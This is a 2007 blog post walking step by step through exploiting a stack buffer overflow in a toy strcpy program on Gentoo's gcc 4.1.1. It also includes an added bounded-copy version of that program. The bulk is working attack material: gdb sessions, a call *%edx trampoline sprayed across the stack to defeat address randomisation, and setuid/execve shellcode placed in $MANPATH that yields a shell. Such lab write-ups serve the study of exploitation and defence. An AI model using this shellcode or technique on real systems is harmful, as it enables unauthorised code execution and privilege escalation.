Overflowing Gentoo’s Gcc

April 18th, 2007 by xwings

From the last post, I found out two things:

i. jmp %esp is not usable for me.
ii. [buffer] + 4 is not usable either (at the moment, maybe?).

The good thing about [buffer] + 4 is that it fixes the return address in the last 4 bytes, but for some reason we still need to find out the real return address.
For example, the jmp %esp gadget is at 0xffffe75b (jmp *%esp); when we put that into the 4-byte area, it becomes the following:

$ cat abo1.c
#include <string.h>

int main(int argc, char **argv) {
    char buf[256];

    /* no length check: an argument longer than 255 bytes overruns buf
       and the saved return address behind it */
    strcpy(buf, argv[1]);
    return 0;
}
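As an added example that is not part of the original post, here is the same copy abo1.c does, but with the bound that strcpy() lacks: an oversized argument is rejected instead of overwriting the saved return address (the gcc shown further down was built with --disable-libssp, so no stack protector would catch the overrun either). The names copy_arg and try_overflow are chosen here.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256   /* same buffer size as abo1.c */

/* Bounded replacement for abo1.c's strcpy(buf, argv[1]).
 * Returns 0 on success, -1 if src (including its NUL) does not fit in dst,
 * in which case dst is left untouched. */
int copy_arg(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (len >= dst_size)          /* keep room for the terminating NUL */
        return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* Reproduces the post's test input, n bytes of 'A' (ruby -e 'print "\x41" * n'),
 * against a 256-byte stack buffer and returns copy_arg's verdict.
 * Constructed input; assumed helper, not from the post. */
int try_overflow(size_t n)
{
    char buf[BUF_SIZE];
    char big[1024];
    if (n >= sizeof big)
        return -1;
    memset(big, 'A', n);
    big[n] = '\0';
    return copy_arg(buf, sizeof buf, big);
}

int main(int argc, char **argv)
{
    char buf[BUF_SIZE];
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (copy_arg(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "argument too long (%zu bytes, max %d)\n",
                strlen(argv[1]), BUF_SIZE - 1);
        return 1;
    }
    printf("copied %zu bytes\n", strlen(buf));
    return 0;
}
```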

$ gcc -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: /var/tmp/portage/sys-devel/gcc-4.1.1-r3/work/gcc-4.1.1/configure --prefix=/usr --bindir=/usr/i686-pc-linux-gnu/gcc-bin/4.1.1 --includedir=/usr/lib/gcc/i686-pc-linux-gnu/4.1.1/include --datadir=/usr/share/gcc-data/i686-pc-linux-gnu/4.1.1 --mandir=/usr/share/gcc-data/i686-pc-linux-gnu/4.1.1/man --infodir=/usr/share/gcc-data/i686-pc-linux-gnu/4.1.1/info --with-gxx-include-dir=/usr/lib/gcc/i686-pc-linux-gnu/4.1.1/include/g++-v4 --host=i686-pc-linux-gnu --build=i686-pc-linux-gnu --disable-altivec --enable-nls --without-included-gettext --with-system-zlib --disable-checking --disable-werror --enable-secureplt --disable-libunwind-exceptions --disable-multilib --disable-libmudflap --disable-libssp --disable-libgcj --enable-languages=c,c++,fortran --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu
Thread model: posix
gcc version 4.1.1 (Gentoo 4.1.1-r3)

gdb>r `ruby -e 'print "\x41" * 256;print "\x5b\xe7\xff\xff"'`
Failed to read a valid object file image from memory.

Program received signal SIGSEGV, Segmentation fault.
_______________________________________________________________________________
eax:BF871784 ebx:B7F13FF4 ecx:FFFFE75B edx:BF873392 eflags:00210286
esi:B7F47CA0 edi:00000000 esp:FFFFE75B ebp:BF871800 eip:FFE1E400
cs:0073 ds:007B es:007B fs:0000 gs:0033 ss:007B o d I t S z a P c
[007B:FFFFE75B]———————————————————[stack]
FFFFE78B : Error while running hook_stop:
Cannot access memory at address 0xffffe78b
0xffe1e400 in ?? ()

By adjusting the first byte in "\x5b\xe7\xff\xff", we can still make it jump to %esp, but %esp will then start at that 4-byte address, which is not what we want.

Here is a quick and dirty way to bypass the protection. Trigger the overflow again:

gdb>r `ruby -e 'print "\x41" * 256'`
Failed to read a valid object file image from memory.

Program received signal SIGSEGV, Segmentation fault.
_______________________________________________________________________________
eax:BFE16D34 ebx:B7EE2FF4 ecx:BFE16E00 edx:BFE17392 eflags:00210282
esi:B7F16CA0 edi:00000000 esp:BFE16E00 ebp:BFE16EA8 eip:41414141
cs:0073 ds:007B es:007B fs:0000 gs:0033 ss:007B o d I t S z a p c
[007B:BFE16E00]———————————————————[stack]
BFE16E30 : 41 41 41 41 00 6E E1 BF - A8 6E E1 BF 38 48 DD B7 AAAA.n…n..8H..
BFE16E20 : 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
BFE16E10 : 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
BFE16E00 : 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
[007B:B7F16CA0]———————————————————[ data]
B7F16CA0 : 00 00 00 00 00 10 00 00 - 13 06 02 00 7B 70 E1 BF …………{p..
B7F16CB0 : 04 00 00 00 70 A6 EF B7 - 03 00 00 00 64 00 00 00 ….p…….d…
[0073:41414141]———————————————————[ code]
0x41414141: Error while running hook_stop:
Cannot access memory at address 0x41414141
0x41414141 in ?? ()
gdb>x/s $edx
0xbfe17392: "LC_PAPER=en_US"

Clearly, $edx points back into the stack, so a jmp %edx or call %edx will help in this case.
To look for the right jump:

$ objdump -d ./abo1 | grep edx | grep call
8048369: ff d2 call *%edx

There are two things that need to be fulfilled:
i. The buffer size needs to be 256.
ii. The return address is randomized; it will be anywhere within the stack.

To handle this, we fill the stack with the address of the call *%edx instruction (0x08048369).

gdb>r `ruby -e 'print "\x69\x83\x04\x08" * 64'`
Failed to read a valid object file image from memory.

Program received signal SIGSEGV, Segmentation fault.
_______________________________________________________________________________
eax:BF90E78D ebx:B7F53FF5 ecx:BF90E802 edx:BF910302 eflags:00210A96
esi:B7F87C9F edi:04836B08 esp:BF90E7E7 ebp:BF90E909 eip:BF91031E
cs:0073 ds:007B es:007B fs:0000 gs:0033 ss:007B O d I t S z A P c
[007B:BF90E7E7]———————————————————[stack]
BF90E817 : 08 69 83 04 08 69 83 04 - 08 69 83 04 08 69 83 04 .i…i…i…i..
BF90E807 : 08 69 83 04 08 69 83 04 - 08 69 83 04 08 69 83 04 .i…i…i…i..
BF90E7F7 : 94 E7 90 BF 94 E7 90 BF - 08 69 83 04 08 69 83 04 ………i…i..
BF90E7E7 : EB E7 90 BF 94 E7 90 BF - F5 3F F5 B7 02 03 91 BF ………?……
[007B:B7F87C9F]———————————————————[ data]
B7F87C9F : 00 00 00 00 00 00 10 00 - 00 13 06 02 00 DB EA 90 …………….
B7F87CAF : BF 04 00 00 00 70 B6 F6 - B7 03 00 00 00 64 00 00 …..p…….d..
[0073:BF91031E]———————————————————[ code]
0xbf91031e: ins BYTE PTR es:[edi],[dx]
0xbf91031f: outs [dx],DWORD PTR ds:[esi]
0xbf910320: arpl WORD PTR [ecx+108],sp
0xbf910323: das
0xbf910324: jae 0xbf91038e
0xbf910326: popa
——————————————————————————
0xbf91031e in ?? ()
gdb>x/5s $edx
0xbf910302: "LC_PAPER=en_US"
0xbf910311: "MANPATH=/usr/local/share/man:/usr/share/man:/usr/share/binutilsdata/i686-pc-linux-gnu/2.16.1/man:/usr/share/gcc-data/i686-pc-linux-gnu/4.1.1/man:/usr/qt/3/doc/man:/opt/vmware/workstation/man"
0xbf9103d1: "KDE_MULTIHEAD=false"
0xbf9103e5: "LC_ADDRESS=en_US"
0xbf9103f6: "LC_MONETARY=en_US"
gdb>x/5s $eip
0xbf91031e: "local/share/man:/usr/share/man:/usr/share/binutils-data/i686-pc-linux-gnu/2.16.1/man:/usr/share/gcc-data/i686-pc-linux-gnu/4.1.1/man:/usr/qt/3/doc/man:/opt/vmware/workstation/man"
0xbf9103d1: "KDE_MULTIHEAD=false"
0xbf9103e5: "LC_ADDRESS=en_US"
0xbf9103f6: "LC_MONETARY=en_US"
0xbf910408: "MRXVT_TABTITLE=Terminal"

Since %eip lands somewhere inside $MANPATH, will replacing the contents of $MANPATH work?

$ export MANPATH="/usr/`ruby -e 'print "\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80"'`"
$ gdb -q ./abo1
gdb>r `ruby -e 'print "\x69\x83\x04\x08" * 64'`
Failed to read a valid object file image from memory.
sh-3.1$ uname -a
Linux muscat 2.6.19-gentoo-r5 #10 SMP Sat Feb 24 02:23:15 MYT 2007 i686 Genuine Intel(R) CPU T2300 @ 1.66GHz GenuineIntel GNU/Linu

Bingo!!

To download this note, go to Buffer Overflow testing on gentoo gcc 4.1.1.
